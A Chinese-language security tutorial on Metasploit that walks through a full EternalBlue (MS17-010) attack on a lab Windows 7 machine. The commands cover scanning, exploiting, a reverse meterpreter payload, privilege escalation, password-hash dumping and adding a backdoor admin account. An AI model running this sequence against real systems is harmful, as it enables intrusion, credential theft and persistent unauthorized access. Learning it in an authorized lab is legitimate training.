网络安全从入门到精通(第十章-3)利用工具快速拿下服务器(KaLi-MSF)

本文内容:
		~认识MSF和永恒之蓝
		~MSF的基础命令
		~漏洞利用基本流程
		~实战漏洞利用
额外说明:
		这篇文章,仅仅作为扩展,大家了解一下MSF(美少妇)

一、认识MSF和永恒之蓝

1,定义
		Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、
		开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的
		专业级漏洞攻击工具		
		
		我们能够通过它发现漏洞并进行快速实施攻击(需要在授权的情况下!)
				//这款“美少妇”工具kali自带
2,使用
		第一次使用MSF,

		开启数据库:service postgresql start
		
		初始化msf数据库:  msfdb init
		
		开启MSF:  msfconsole
		
		注意:
				~这是初始化msf的默认数据库,不然运行会比较慢
					以后再使用的话,就直接开启msf即可
				
				~MSF的启动漫画是随机的

二、MSF的基础命令

1,msf5的五大模块

		~auxiliary  辅助模块
		
				为渗透测试信息搜集提供了大量的辅助模块支持
				
				命名规则:
						操作系统/服务/名称      
						windows/smb/ms17_010_eternalblue 
	
		
		~Exploits	攻击模块
		
				利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,
				从而获得对远程目标系统访问权的代码组件。
		
		~Payload	攻击载荷模块
		
				攻击成功后促使靶机运行的一段植入代码
				
				命名规则:
						操作系统/类型/名称   
						windows/x64/meterpreter/reverse_tcp  

			
		~Post		后渗透攻击模块
		
				收集更多信息或进一步访问被利用的目标系统

		~Encoders	编码模块
		
				将攻击载荷进行编码,来绕过防护软件拦截

2,常用命令
		~help/?	      	 帮助菜单

		~exit			 退出msf

		~Back        	 返回

		~show			 显示所给类型的模块
				
				例如:show auxiliary		//查看辅助模块
					
				补充:
						~rank表示好用级别:
								normal(正常),
								excellent(优秀),
								good(良好),
								average(平均)

						~数字	
								代表一种作用,可以直接用前边数字调用
			
		
		~info			显示一个或者多个模块的信息
			
				例如: 	info windows/smb/ms17_010_eternalblue

		~search 		 寻找
				
				例如:search ms17
		
		
		~更新MSF:apt-get  install metasploit-framework

三、漏洞利用基本流程

	扫描靶机 		
	
			use auxiliary/scanner/smb/smb_ms17_010		//使用辅助模块
			
			进入此模块,输入options,
			在这个下,我们可以看看我们需要设置哪些参数
					
				(	Required栏为“yes”的参数,要不是系统已经设置好的
					要不就是需要我们设置的	)
					
			例如 :我们设置rhosts,	set rhosts 192.168.221.129

	选择exploit		
			
			之后出现的结果,前边出现绿色的“[+]”且后边出现我们的目标IP
			就说明我们可以进行攻击
			
			back	返回上一级
			
			use exploit/windows/smb/ms17_010_eternalblue
			
			option看一下
			
			set rhosts 192.168.221.129
			
	选择payload		
			
			set payload windows/x64/meterpreter/reverse_tcp	
			
			options看一下(因为payload也需要设置配置)
			
			set lhosts	192.168.221.133		//lhosts是本机IP
			//	设置之后,
				我们之前打进去的木马,就会来找我们的IP
			
	攻击			exploit
		
	提权			getsystem
		
	枚举密码			hashdump	//一般密码都是加密的
		
	去拿个shell		shell
	
	查看权限			whoami
	
	在尝试添加一个账户
	net user admin admin /add
	
	在看看所有用户	net user
	
	//本次攻击靶机是win 7 sp1		//win 7 企业版

四、实战漏洞利用

1,正反向连接
		~正向连接 : 我们去连接木马
		~反向连接 : 木马来连接我们		//这个更稳定一些,且不太容易被拦截

2,不熟悉的话,多练习几遍

3,提权的原理
		对面(目标)运行的一些程序具有高权限,
		我们利用这个进程执行一些命令,以达到我么的目的
		
		iis6.0de提权	建议百度一下
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章